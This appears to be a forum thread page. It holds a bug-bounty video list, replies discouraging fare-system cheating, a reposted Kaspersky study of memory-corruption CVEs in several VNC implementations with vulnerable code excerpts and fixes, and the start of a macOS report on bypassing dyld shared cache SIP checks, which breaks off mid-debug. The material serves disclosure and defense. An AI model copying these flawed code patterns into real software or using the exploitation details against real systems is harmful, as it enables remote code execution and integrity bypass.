230. Sensitive information sent via unencrypted channels - https://www.youtube.com/watch?v=21_IYz4npRs

Phase 13 – Business logic vulnerability
231. What is a business logic flaw - https://www.youtube.com/watch?v=ICbvQzva6lE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI
232. The Difficulties Finding Business Logic Vulnerabilities with Traditional Security Tools - https://www.youtube.com/watch?v=JTMg0bhkUbo&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=2
233. How To Identify Business Logic Flaws - https://www.youtube.com/watch?v=FJcgfLM4SAY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=3
234. Business Logic Flaws: Attacker Mindset - https://www.youtube.com/watch?v=Svxh9KSTL3Y&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=4
235. Business Logic Flaws: Dos Attack On Resource - https://www.youtube.com/watch?v=4S6HWzhmXQk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=5
236. Business Logic Flaws: Abuse Cases: Information Disclosure - https://www.youtube.com/watch?v=HrHdUEUwMHk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=6
237. Business Logic Flaws: Abuse Cases: iPod Repairman Dupes Apple - https://www.youtube.com/watch?v=8yB_ApVsdhA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=7
238. Business Logic Flaws: Abuse Cases: Online Auction - https://www.youtube.com/watch?v=oa_UICCqfbY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=8
239. Business Logic Flaws: How To Navigate Code Using ShiftLeft Ocular - https://www.youtube.com/watch?v=hz7IZu6H6oE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=9
240. Business Logic Security Checks: Data Privacy Compliance - https://www.youtube.com/watch?v=qX2fyniKUIQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=10
241. Business Logic Security Checks: Encryption Compliance - https://www.youtube.com/watch?v=V8zphJbltDY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=11
242. Business Logic Security: Enforcement Checks - https://www.youtube.com/watch?v=5e7qgY_L3UQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=12
243. Business Logic Exploits: SQL Injection - https://www.youtube.com/watch?v=hcIysfhA9AA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=13
244. Business Logic Exploits: Security Misconfiguration - https://www.youtube.com/watch?v=ppLBtCQcYRk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=15
245. Business Logic Exploits: Data Leakage - https://www.youtube.com/watch?v=qe0bEvguvbs&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=16
246. Demo 1 - https://www.youtube.com/watch?v=yV7O-QRyOao
247. Demo 2 - https://www.youtube.com/watch?v=mzjTG7pKmQI
248. Demo 3 - https://www.youtube.com/watch?v=A8V_58QZPMs
249. Demo 4 - https://www.youtube.com/watch?v=1pvrEKAFJyk
250. Demo 5 - https://hackerone.com/reports/145745
251. Demo 6 - https://hackerone.com/reports/430854

Sursa: https://drive.google.com/file/d/11TajgAcem-XI5H8Pu8Aa2GiUofyM0oQm/view
16. Can't you just show them those pictures and be done with it? Still, whatever you do, if they catch on and alert the ticket inspectors/police, I think it would end badly.
17. Hi, I don't think I understood exactly what you're actually trying to do. From my point of view, if you try to trick that payment system, you're very likely to end up with problems much bigger than $240 a month. I'm fairly sure there is a trip-validation mechanism that can be difficult to fool. Even here in Romania, the RATB/STB system is difficult to cheat.
18. VNC vulnerability research

22 November 2019

Contents: Preparing for the research; System description; Possible attack vectors; Objects of research; Prior research; Research findings (LibVNC, TightVNC, TurboVNC, UltraVNC, CVE-2018-15361, CVE-2019-8262); Conclusion

In this article, we discuss the findings of research that covered several different implementations of a remote access system called Virtual Network Computing (VNC). As a result of this research, we identified a number of memory corruption vulnerabilities, which have been assigned a total of 37 CVE identifiers. Some of the vulnerabilities identified, if exploited, could lead to remote code execution.

Preparing for the research

The VNC system is designed to provide one device with remote access to another device's screen. It is worth noting that the protocol's specification does not limit the choice of OS and allows cross-platform implementations. There are implementations both for common operating systems (GNU/Linux, Windows, Android) and for exotic ones. VNC has become one of the most widespread systems of its kind, thanks in part to cross-platform implementations and open-source licenses. The exact number of installations is hard to estimate: based on data from shodan.io, over 600,000 VNC servers are reachable online, and if you add devices that are only available on the local network, it can be confidently assumed that the total number of VNC servers in use is many times (perhaps orders of magnitude) greater.

According to our data, VNC is actively used in industrial automation systems. We have recently published an article on our website about the use of remote administration tools in industrial control systems. It estimates that various remote administration tools (RATs), including VNC, are installed on about 32% of industrial control system computers. In 18.6% of all cases, RATs are included in ICS software distribution packages and are installed with that software. The remaining 81.4% were apparently installed by honest or not-so-honest employees of these enterprises or their contractors.

In an article published on our website, we described attacks we had analyzed in which the attackers installed and used remote administration tools. Importantly, in some cases the attackers exploited vulnerabilities in remote administration tools as part of their attack scenarios. According to our estimates, most ICS vendors implement remote administration tools for their products based on VNC rather than any other system. This made an analysis of VNC security a high-priority task for us.

In 2019, the BlueKeep vulnerability (CVE-2019-0708) in Windows RDP (Remote Desktop Services) triggered a strong public response. The vulnerability enabled an unauthenticated attacker to achieve remote code execution with SYSTEM privileges on a Windows machine running the RDP server. It affected older versions of the operating system, such as Windows 7 SP1 and Windows Server 2008 SP1 and SP2. Some VNC server components on Windows are implemented as services, which means they, too, have privileged access to the system. This is one more reason for prioritizing research on the security of VNC.

System description

VNC (Virtual Network Computing) is a system designed to provide remote access to the operating system's user interface (desktop). VNC uses the RFB (remote frame buffer) protocol to transfer screen images, mouse movements and keypress events between devices. As a rule, each implementation of the system includes a server component and a client component; since the RFB protocol is standardized, different implementations of the client and server parts are interchangeable.

The server component sends the image of the server's desktop to the client for viewing, and the client in turn transmits client-side events (such as mouse cursor movements, keypresses, and data copied and pasted via the cut buffer) back to the server. This enables the user on the client side to work on the remote machine where the VNC server is running.

The VNC server sends an image every time the remote machine's desktop is updated, which can occur, among other things, as a result of the client's actions. Sending a complete new screenshot over the network is a relatively resource-intensive operation, so instead of sending the entire screenshot the protocol updates only those pixels that have changed as a result of some action or event. RFB also supports several screen update compression and encoding methods; for example, compression can be performed using zlib or RLE (run-length encoding). Although the software is designed to perform a simple task, it has enough functionality for programmers to make mistakes at the development stage.

Possible attack vectors

Since the VNC system consists of server and client components, below we look at two main attack vectors:

1. An attacker is on the same network as the VNC server and attacks it to gain the ability to execute code on the server with the server's privileges.
2. A user connects to an attacker's "server" using a VNC client, and the attacker exploits vulnerabilities in the client to attack the user and execute code on the user's machine.

Attackers would without doubt prefer remote code execution on the server. However, most vulnerabilities are found in the system's client component. In part, this is because the client includes code designed to decode data sent by the server in all sorts of formats, and it is while writing data decoding components that developers often make errors resulting in memory corruption vulnerabilities. The server part, on the other hand, can have a relatively small codebase, designed to send encoded screen updates to the user and handle events received from the client side. According to the specification, the server must support only six message types to provide all the functions required for its operation. This means that most server components have almost no complicated functionality, reducing the chances of a developer making an error. However, some systems implement various extensions to augment the server's functionality, such as file transfer, chat between the client and the server, and many others. As our research demonstrated, it is in the code designed to augment the server's functionality that the majority of errors were made.

Objects of research

We selected the most common VNC implementations for our research:

- LibVNC – an open-source cross-platform library for creating a custom application based on the RFB protocol. The server component of LibVNC is used, for example, in VirtualBox to provide access to the virtual machine via VNC.
- UltraVNC – a popular open-source VNC implementation developed specifically for Windows. Recommended by many industrial automation companies for connecting to remote HMI interfaces over the RFB protocol (see, for example, here and here).
- TightVNC 1.X – one more popular implementation of the RFB protocol. Recommended by many industrial automation system vendors for connecting to HMI interfaces from *nix machines.
- TurboVNC – an open-source VNC implementation. Uses the libjpeg-turbo library to compress JPEG images in order to accelerate image transfer.

As part of our research, we did not analyze the security of a very popular product called RealVNC, because the product's license does not allow reverse engineering.

Prior research

Before beginning to analyze VNC implementations, it is essential to do reconnaissance and see what vulnerabilities have already been identified in each of them. In 2014, the Google Security Team published a small LibVNC vulnerability analysis report. Since the project includes a very small amount of code, it could be assumed that Google engineers had identified all vulnerabilities existing in LibVNC. However, I was able to find several issues on GitHub (for example, this and this) which were created later than 2014.

The number of vulnerabilities identified in the UltraVNC project is not large. Most of them have to do with a simple stack overflow: arbitrary-length data written to a fixed-size buffer on the stack. All known vulnerabilities were found a relatively long time ago; the project's codebase has grown since then, while the older code still contained the old vulnerabilities.

Research findings

LibVNC

After analyzing previously identified vulnerabilities, I fairly easily found variants of some of them in the code of the extension providing file transfer functionality. The extension is not enabled by default: developers must explicitly allow it to be used in their LibVNC-based projects. This is probably why these vulnerabilities had not been identified before.

Next, I moved on from analyzing server code to researching the client part. It was there that I found the vulnerabilities that were most critical for the project, and also quite diverse. Among those identified, it is worth mentioning several classes of vulnerabilities that will also come up in other projects based on the RFB protocol. Each of these classes was made possible by the design of the protocol's specification: it does not guard developers against these classes of bugs, enabling such flaws to appear in the code.

As an illustration of this point, you can look at the structures used in VNC projects to handle network messages. For example, open the rfbproto.h file, which has been used by generations of VNC project developers since 1999. The file is included in the LibVNC project, among others. An excellent example for demonstrating the first class of vulnerabilities is the rfbClientCutTextMsg structure, which is used to inform the server about changes to the client's cut buffer:

typedef struct {
    uint8_t type;      /* always rfbClientCutText */
    uint8_t pad1;
    uint16_t pad2;
    uint32_t length;
    /* followed by char text[length] */
} rfbClientCutTextMsg;

After establishing a connection and performing an initial handshake, during which the client and the server agree on specific screen settings, all messages transferred have the same format. Each message starts with one byte, which represents the message type. Depending on the message type, a message handler and a structure matching the type are selected. In different VNC clients, the structure is filled in more or less the same way (pseudocode in C):

ReadFullData(socket, ((char *)&msg) + 1, sz_rfbServerSomeMessageType - 1);

In this way, the entire message structure is filled in, with the exception of the first byte, which defines the message type. It can be seen that all fields in the structure are controlled by the remote user. It should also be noted that msg is a union of all possible message structures. Since the contents of the cut buffer have an unspecified length, memory for them will be allocated dynamically, using malloc. It should also be remembered that the cut buffer field should presumably contain text, and it is customary in C to terminate text data with the zero character. Given all this, as well as the fact that the length field has the type uint32_t and is fully controlled by the remote user, we have a typical integer overflow (pseudocode in C):

char *text = malloc(msg.length + 1);
ReadFullData(socket, text, msg.length);
text[msg.length] = 0;

If an attacker sends a length field equal to UINT32_MAX = 2^32 - 1 = 0xffffffff, the integer overflow turns this into a call to malloc(0). If the standard glibc malloc memory allocation mechanism is used, the call will return a chunk of the smallest possible size, 16 bytes. At the same time, a length equal to UINT32_MAX will be passed to the ReadFullData function as an argument, which, in the case of LibVNC, results in a heap-based buffer overflow.

The second vulnerability type can be demonstrated on the same structure. As one can read in the specification or the RFC, some structures include padding for field alignment. From a security researcher's viewpoint, however, this is just one more opportunity to discover a memory initialization error (see here and here). Let's have a look at this typical error (pseudocode in C):

rfbClientCutTextMsg cct;
cct.type = rfbClientCutText;
cct.length = length;
WriteToRFBServer(socket, &cct, sz_rfbClientCutTextMsg);
WriteToRFBServer(socket, str, len);

The message structure is created on the stack, after which some of its fields are filled in and the structure is sent to the server. The fields pad1 and pad2 remain uninitialized, so uninitialized stack memory is sent over the network, where an attacker can read it. If the attacker is lucky, the leaked memory may contain an address from the heap, the stack or the text section, enabling the attacker to bypass ASLR and use an overflow to achieve remote code execution on the client.

Such trivial vulnerabilities came up in VNC projects often enough that we decided to treat them as separate classes. It is worth noting that analyzing projects such as LibVNC, which are positioned as cross-platform solutions, is not an easy task. While doing research on such projects, one should ignore anything specific to the OS and architecture of the researcher's computer and view the project exclusively through the prism of the C language standard; otherwise it is easy to miss obvious flaws that can only be reproduced on a specific platform.
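To make these two bug classes concrete, here is a minimal hardened sketch of the cut-text read (my own illustration, not code from any of the projects discussed; the ReadFullData helper, its assumed return convention, and the MAX_CUTTEXT_LEN cap are inventions for the example):

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Layout from the article (padding fields kept for completeness). */
typedef struct {
    uint8_t  type;     /* always rfbClientCutText */
    uint8_t  pad1;
    uint16_t pad2;
    uint32_t length;
} rfbClientCutTextMsg;

/* Assumed helper from the pseudocode above: reads exactly n bytes.
 * The "returns 0 on success" convention is an assumption. */
extern int ReadFullData(int sock, char *buf, size_t n);

#define MAX_CUTTEXT_LEN (1u << 20)  /* arbitrary sanity cap: 1 MiB */

char *read_cut_text(int sock, const rfbClientCutTextMsg *msg)
{
    if (msg->length > MAX_CUTTEXT_LEN)            /* reject absurd lengths first */
        return NULL;

    char *text = malloc((size_t)msg->length + 1); /* cannot wrap: length is capped */
    if (text == NULL)
        return NULL;

    if (ReadFullData(sock, text, msg->length) != 0) {
        free(text);
        return NULL;
    }
    text[msg->length] = '\0';
    return text;
}

/* On the sending side, zeroing the whole structure before filling it in,
 * e.g. memset(&cct, 0, sizeof cct), keeps the padding bytes pad1/pad2
 * from leaking uninitialized stack memory. */

Capping the length before doing any arithmetic on it also avoids size_t wraparound on 32-bit platforms, where size_t is only 32 bits wide.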
In one such case, for example, the heap overflow vulnerability was incorrectly fixed on the 32-bit platform, because the size of the size_t type on x86_64 differs from its size on 32-bit x86. Information on all identified vulnerabilities was provided to the developers and the vulnerabilities were closed (some even twice, thanks to Solar Designer for the help).

TightVNC

The next target for research was a fairly popular VNC client implementation for GNU/Linux. I was able to identify vulnerabilities in that system very quickly, because most were fairly straightforward and some were identical to those found in LibVNC. The original article compares two code fragments from the two projects side by side [figure: the CoRRE decoding code in TightVNC next to the same code in LibVNC]. Originally, this vulnerability was identified in the LibVNC project, in the CoRRE decoding method. In that code fragment, data of arbitrary length is read into a fixed-length buffer inside the rfbClient structure, which naturally results in a buffer overflow. By a curious coincidence, function pointers are located inside the structure, almost right after the buffer, which almost immediately results in code execution.

It can be observed that, with the exception of some minor variations, the code fragments from LibVNC and TightVNC can be considered identical. Both fragments were copied from AT&T Laboratories code; the developers introduced this vulnerability back in 1999. (I was able to determine this through the AT&T Laboratories license, in which developers usually specify who was involved in the development project during different time periods.) That code has been modified several times since then (for example, in LibVNC the static global buffer was moved to the client's structure), but the vulnerability survived all the modifications.

It is also worth noting that HandleCoRREBPP is a rather original name. If you search the code of projects on GitHub for this character combination, you can find lots of VNC-related projects that thoughtlessly copied the vulnerable decoding function carrying this name, or the entire LibVNC library. This is why these projects may remain vulnerable forever, unless the developers update the contents of their projects or fix the vulnerability in the code themselves.

The character combination HandleCoRREBPP is in fact not a function name. BPP in this case stands for "Bits Per Pixel" and is a number equal to 8, 16 or 32, depending on the color depth agreed on by the client and the server at the initialization stage. It is assumed that developers will use this file as an auxiliary file in their macros as follows:

#ifndef HandleCoRRE8
#define BPP 32
#include "corre.h"
#undef BPP
#endif

The result is several functions: HandleCoRRE8, HandleCoRRE16 and HandleCoRRE32. Since the program was originally written in C rather than C++, the developers had to come up with such tricks because there were no templates available. However, if you google the function name HandleCoRRE or HandleCoRRE32, you may discover projects which were slightly modified, with or without such patterns, but which still contain the vulnerability. Unfortunately, there are hundreds of projects into which this code was included or copied without any changes, and it is not always possible to contact their developers.

The sad story of TightVNC does not end here. When we reported the vulnerabilities to the TightVNC developers, they thanked us for the information and let us know that they had discontinued the development of the TightVNC 1.X line and no longer fixed any vulnerabilities found in it, because doing so had become uneconomical for their company. At some point, GlavSoft began to develop a new line, TightVNC 2.X, which does not include any GPL-licensed third-party code and which can therefore be developed as a commercial product. It should be noted that TightVNC 2.X for Unix systems is distributed only under commercial licenses and should not be expected to be released as open-source software.

We reported the vulnerabilities identified in TightVNC to oss-security and emphasized that package maintainers needed to fix these vulnerabilities themselves. Although we sent our notification to package maintainers in January 2019, the vulnerabilities had not been fixed at the time of this article's publication (November 2019).

TurboVNC

This VNC project deserves a special 'prize': the one vulnerability identified in it is mind-boggling. Consider a C code fragment taken from the main server function designed to handle user messages:

char data[64];

READ(((char *)&msg) + 1, sz_rfbFenceMsg - 1)
READ(data, msg.f.length)   /* up to 255 bytes read into a 64-byte stack buffer */

if (msg.f.length > sizeof(data))
    rfbLog("Ignoring fence. Payload of %d bytes is too large.\n", msg.f.length);
else
    HandleFence(cl, flags, msg.f.length, data);
return;

This code fragment reads a message in the rfbFenceType format. The message tells the server the length msg.f.length (of type uint8_t) of the user data that follows. This is obviously a case of arbitrary user data being read into a fixed-size buffer, resulting in a stack overflow: the length check is performed only after the data has already been read into the buffer. Due to the absence of overflow protection on the stack (a so-called canary), this vulnerability makes it possible to control the return address and, consequently, to achieve remote code execution on the server. An attacker would, however, first need to obtain authentication credentials to connect to the VNC server, or gain control of the client before the connection is established.

UltraVNC

In UltraVNC, I was able to identify multiple vulnerabilities in both the server and the client components of the project, to which 22 CVE IDs were assigned. A distinguishing feature of this project is its focus on Windows systems.

When analyzing projects that can be compiled for GNU/Linux, I prefer to take two different approaches to vulnerability search. First, I analyze the code, looking for vulnerabilities in it. Second, I try to figure out how the search for vulnerabilities in the project can be automated using fuzzing. This is what I did when analyzing LibVNC, TurboVNC and TightVNC. For such projects, it is very easy to write a wrapper for libfuzzer, since the project does not depend on a specific operating system's implementation of the network API: there is an additional abstraction layer implemented for that. To write a good fuzzer, all you have to do is implement the target function yourself and rewrite the networking functions, so that data from the fuzzer is fed to the program as if it had been transferred over the network (a minimal harness along these lines is sketched below). However, in the case of projects for Windows, this technique is difficult to use even with open-source code, because the relevant tools are either not available or poorly developed.
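For the GNU/Linux-friendly projects, such a wrapper can be tiny. Here is a minimal libFuzzer-style harness sketch (my own illustration, not code from the research; vnc_handle_server_message stands in for whatever message-parsing entry point the project under test exposes):

#include <stddef.h>
#include <stdint.h>

/* Hypothetical parser under test: consumes one RFB message from an
 * in-memory buffer instead of a socket. */
extern int vnc_handle_server_message(const uint8_t *buf, size_t len);

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    /* The real client reads from a socket; for fuzzing, the networking
     * functions are reimplemented to read from (data, size) instead. */
    vnc_handle_server_message(data, size);
    return 0;  /* libFuzzer only cares about crashes and sanitizer reports */
}

/* Build sketch (assuming clang):
 *   clang -g -fsanitize=address,fuzzer harness.c parser.c -o fuzz_vnc
 */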
On Windows, at the time of the analysis, libfuzzer had not yet been released. In addition, the event-oriented approach used in Windows application development means that a very large amount of code would have to be rewritten to achieve good fuzzing coverage. Because of this, I used only manual code analysis when looking for vulnerabilities in UltraVNC. As a result, I found an entire 'zoo' of vulnerabilities in UltraVNC, from trivial buffer overflows in strcpy and sprintf calls to more or less curious vulnerabilities that are rarely encountered in real-world projects. Below we discuss some of these vulnerabilities.

CVE-2018-15361

This vulnerability exists in UltraVNC client-side code. At the initialization stage, the server provides information on display height and width, color depth, the palette, and the name of the desktop, which can be displayed, for example, in the title bar of the window. The name of the desktop is a string of undefined length, so the string's length is sent to the client first, followed by the string itself. The relevant fragment of code is shown below:

void ClientConnection::ReadServerInit()
{
    ReadExact((char *)&m_si, sz_rfbServerInitMsg);
    m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth);
    m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight);
    m_si.format.redMax = Swap16IfLE(m_si.format.redMax);
    m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax);
    m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax);
    m_si.nameLength = Swap32IfLE(m_si.nameLength);

    /* nameLength is attacker-controlled: the additions below can overflow */
    m_desktopName = new TCHAR[m_si.nameLength + 4 + 256];
    m_desktopName_viewonly = new TCHAR[m_si.nameLength + 4 + 256 + 16];
    ReadString(m_desktopName, m_si.nameLength);
    . . .
}

The attentive reader will correctly observe that the above code contains an integer overflow vulnerability. However, in this case the vulnerability leads not to a heap-based buffer overflow in the ReadString function, but to more curious consequences.

void ClientConnection::ReadString(char *buf, int length)
{
    if (length > 0)
        ReadExact(buf, length);
    buf[length] = '\0';
}

The ReadString function is designed to read a string of length length and terminate it with a zero. Note that the function takes a signed type as its second argument. If we specify a very large number in m_si.nameLength, it will be treated as a negative number when passed to ReadString. As a result, length fails the positivity check and the buf array remains uninitialized. Only one thing will happen: a null byte will be written at offset buf + length. Given that length is negative, this makes it possible to write the null byte at a fixed negative offset relative to buf.

The upshot is that if an integer overflow occurs when allocating m_desktopName and the buffer is allocated on the regular heap of the process, it becomes possible to write the null byte into the previous chunk. If an integer overflow does not occur and the system has sufficient memory, a large buffer will be allocated, with a new heap created for it. With the right parameters, a remote attacker would be able to write a null byte into the _NT_HEAP structure, which is located directly before a huge chunk. This vulnerability is guaranteed to cause a DoS, but the question of whether remote code execution can be achieved remains open.
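A minimal defensive rewrite (my own sketch, not UltraVNC's actual fix; ReadExact is assumed here to be a free function returning 0 on success, rather than the original class method) takes the length as unsigned and validates it before any allocation or write:

#include <stdint.h>
#include <stdlib.h>

/* Assumed signature for the reader used in the example. */
extern int ReadExact(int sock, char *buf, size_t n);

#define MAX_DESKTOP_NAME 4096u  /* arbitrary sanity cap */

char *read_desktop_name(int sock, uint32_t nameLength)
{
    if (nameLength > MAX_DESKTOP_NAME)   /* reject absurd lengths outright */
        return NULL;

    char *buf = malloc((size_t)nameLength + 1);
    if (buf == NULL)
        return NULL;

    if (nameLength > 0 && ReadExact(sock, buf, nameLength) != 0) {
        free(buf);
        return NULL;
    }
    buf[nameLength] = '\0';              /* offset is now always in bounds */
    return buf;
}

Deriving both the allocation size and the terminating write from the same checked, unsigned value removes both the integer overflow and the negative-offset write.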
I wouldn’t rule out that experts in exploiting the Windows userland heap could turn this vulnerability into an RCE if they wanted to. CVE-2019-8262 The vulnerability was identified in the handler of data encoded using the Ultra encoding. It demonstrates that the security and availability of this functionality really hung by a very thin thread. The handler uses the lzo1x_decompress function from the minilzo library. To understand what the vulnerability is, one has to look at the prototypes of compression and decompression functions. To call the decompression function, one has to pass the buffer containing compressed data, compressed data length, the buffer to which the data should be unpacked and its length as inputs. It should be kept in mind that the function may return an error if the input data cannot be decompressed. In addition, the developer needs to know the exact length of the data that will be unpacked to the output buffer. This means that, in addition to the error code, the function should return a value equal to the number of bytes written. For example, the argument that is used to pass the write buffer length can be used for this, provided that it is passed by pointer. In that case the minimum interface of the decompression function will look as follows: 1 int decompress(const unsigned char *in, size_t in_len, unsigned char *out, size_t *out_len) The first four parameters of this function are the same as the first four parameters of the lzo1x_decompress function. Now consider the fragment of UltraVNC code that contains the critical heap overflow vulnerability. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 void ClientConnection::ReadUltraRect(rfbFramebufferUpdateRectHeader *pfburh) { UINT numpixels = pfburh->r.w * pfburh->r.h; UINT numRawBytes = numpixels * m_minPixelBytes; UINT numCompBytes; lzo_uint new_len; rfbZlibHeader hdr; // Read in the rfbZlibHeader omni_mutex_lock l(m_bitmapdcMutex); ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); CheckBufferSize(numCompBytes); ReadExact(m_netbuf, numCompBytes); CheckZlibBufferSize(numRawBytes); lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL); . . . } As you can see, UltraVNC developers do not check the lzo1x_decompress return code, which is, however, insignificant compared to another flaw – the improper use of new_len. The uninitialized variable new_len is passed to the lzo1x_decompress function. At the time of calling the function, the variable should be equal to the length of the m_zlibbuf buffer. In addition, while debugging vncviewer.exe (the executable file was taken from a build on the UltraVNC official website), I was able to find out why this code had passed the testing stage. It turned out that the problem was that, since the variable new_len was not initialized, it contained a large text section address value. This made it possible for a remote user to pass specially crafted data to the decompression function as inputs to ensure that the function, when writing to the m_zlibbuf buffer, would write the data beyond the buffer’s boundary, resulting in heap overflow. Conclusion In conclusion, I would like to mention that while doing the research I often couldn’t help thinking that the vulnerabilities I found were too unsophisticated to have been missed by everyone before. However, it was true. Each of these vulnerabilities had a very long lifetime. 
Conclusion

In conclusion, I would like to mention that while doing the research I often couldn't help thinking that the vulnerabilities I found were too unsophisticated to have been missed by everyone before. And yet they had been: each of these vulnerabilities had a very long lifetime.

Some of the vulnerability classes identified in the study are present in a large number of open-source projects, surviving even codebase refactoring. I believe it is very important to be able to systematically identify such sets of vulnerable projects containing vulnerabilities that are not always inherited in obvious ways. Almost none of the projects analyzed are unit tested; programs are not systematically tested for security using static code analysis or fuzzing. Magic constants that are abundant in the code make it similar to a house of cards: just one constant changed in this unstable structure could result in a new vulnerability.

Here are our recommendations for developers and vendors that use third-party VNC project code in their products:

- Set up a bug tracking mechanism in all third-party VNC projects used and regularly update their code to the latest release.
- Add compilation options that make it harder for attackers to exploit any vulnerabilities that may exist in the code. Even if researchers are not able to identify all the vulnerabilities in a project, exploiting them should be made as difficult as possible. For example, some of the vulnerabilities described in this article would be impossible to exploit to achieve remote code execution if the project were compiled as a position-independent executable (PIE). In that case, the vulnerabilities would remain, but their exploitation would lead to denial of service (DoS) rather than RCE. Another example is the unfortunate experience with TurboVNC: the compiler can sometimes optimize away the stack canary check. Some compilers perform such optimizations by removing stack canary checks from functions that don't have explicitly allocated arrays. However, the compiler can make a mistake and fail to notice a buffer in one of the structures on the stack or in switch-case statements (which is probably what happened in the case of TurboVNC). To make an identified vulnerability of this kind unexploitable, the compiler should be explicitly told not to optimize away the stack canary checking procedure.
- Perform fuzzing and testing of the project on all architectures for which the project is made available. Some vulnerabilities may manifest themselves only on one of the platforms due to its specific features.
- Be sure to use sanitizers during fuzzing and at the testing stage. For example, a memory sanitizer is guaranteed to identify such vulnerabilities as the use of uninitialized values.

On the positive side, password authentication is often required to exploit server-side vulnerabilities, and the server may not allow users to configure a password-free authentication method for security reasons. This is the case, for example, with UltraVNC. As a safeguard against attacks, clients should not connect to unknown VNC servers and administrators should configure authentication on the server using a unique strong password.
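Returning to the sanitizer recommendation above, here is a minimal example of the bug class from CVE-2019-8262 (a sketch; requires clang with MemorySanitizer support, which is currently available on Linux):

/* uninit.c - build with: clang -g -fsanitize=memory uninit.c -o uninit
 * MemorySanitizer aborts with a "use-of-uninitialized-value" report at
 * the branch below - the same bug class as the uninitialized new_len
 * in CVE-2019-8262. */
#include <stdio.h>

int main(void)
{
    unsigned long new_len;  /* deliberately never initialized */
    if (new_len > 64)       /* MSan flags the uninitialized read here */
        puts("large");
    return 0;
}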
The following vulnerabilities were registered based on this research:

LibVNC
- CVE-2018-6307
- CVE-2018-15126
- CVE-2018-15127
- CVE-2018-20019
- CVE-2018-20020
- CVE-2018-20021
- CVE-2018-20022
- CVE-2018-20023
- CVE-2018-20024
- CVE-2019-15681

TightVNC
- CVE-2019-8287
- CVE-2019-15678
- CVE-2019-15679
- CVE-2019-15680

TurboVNC
- CVE-2019-15683

UltraVNC
- CVE-2018-15361
- CVE-2019-8258
- CVE-2019-8259
- CVE-2019-8260
- CVE-2019-8261
- CVE-2019-8262
- CVE-2019-8263
- CVE-2019-8264
- CVE-2019-8265
- CVE-2019-8266
- CVE-2019-8267
- CVE-2019-8268
- CVE-2019-8269
- CVE-2019-8270
- CVE-2019-8271
- CVE-2019-8272
- CVE-2019-8273
- CVE-2019-8274
- CVE-2019-8275
- CVE-2019-8276
- CVE-2019-8277
- CVE-2019-8280

To be continued…

Download PDF version

Pavel Cheremushkin
Security Researcher, KL ICS CERT

Sursa: https://ics-cert.kaspersky.com/reports/2019/11/22/vnc-vulnerability-research/
19. Tested on macOS Mojave (10.14.6, 18G87) and Catalina Beta (10.15 Beta 19A536g).

On macOS, the dyld shared cache (in /private/var/db/dyld/) is generated locally on the system and therefore doesn't have a real code signature; instead, SIP seems to be the only mechanism that prevents modifications of the dyld shared cache. update_dyld_shared_cache, the tool responsible for generating the shared cache, is able to write to /private/var/db/dyld/ because it has the com.apple.rootless.storage.dyld entitlement. Therefore, update_dyld_shared_cache is responsible for ensuring that it only writes data from trustworthy libraries when updating the shared cache.

update_dyld_shared_cache accepts two interesting command-line arguments that make it difficult to enforce these security properties:

- "-root": Causes libraries to be read from, and the cache to be written to, a caller-specified filesystem location.
- "-overlay": Causes libraries to be read from a caller-specified filesystem location before falling back to normal system directories.

There are some checks related to this, but they don't look very effective. main() tries to see whether the target directory is protected by SIP:

bool requireDylibsBeRootlessProtected = isProtectedBySIP(cacheDir);

If that variable is true, update_dyld_shared_cache attempts to ensure that all source libraries are also protected by SIP. isProtectedBySIP() is implemented as follows:

bool isProtectedBySIP(const std::string& path)
{
    if ( !sipIsEnabled() )
        return false;
    return (rootless_check_trusted(path.c_str()) == 0);
}

Ignoring that this looks like a typical symlink race issue, there's another problem: Looking in a debugger (with SIP configured so that only debugging restrictions and dtrace restrictions are disabled), it seems like rootless_check_trusted() doesn't work as expected:

bash-3.2# lldb /usr/bin/update_dyld_shared_cache
[...]
(lldb) breakpoint set --name isProtectedBySIP(std::__1::basic_string<char,\ std::__1::char_traits<char>,\ std::__1::allocator<char>\ >\ const&)
Breakpoint 1: where = update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&), address = 0x00000001000433a4
[...]
(lldb) run -force
Process 457 launched: '/usr/bin/update_dyld_shared_cache' (x86_64)
Process 457 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
    frame #0: 0x00000001000433a4 update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&)
update_dyld_shared_cache`isProtectedBySIP:
->  0x1000433a4 <+0>: pushq %rbp
    0x1000433a5 <+1>: movq %rsp, %rbp
    0x1000433a8 <+4>: pushq %rbx
    0x1000433a9 <+5>: pushq %rax
Target 0: (update_dyld_shared_cache) stopped.
(lldb) breakpoint set --name rootless_check_trusted
Breakpoint 2: where = libsystem_sandbox.dylib`rootless_check_trusted, address = 0x00007fff5f32b8ea
(lldb) continue
Process 457 resuming
Process 457 stopped
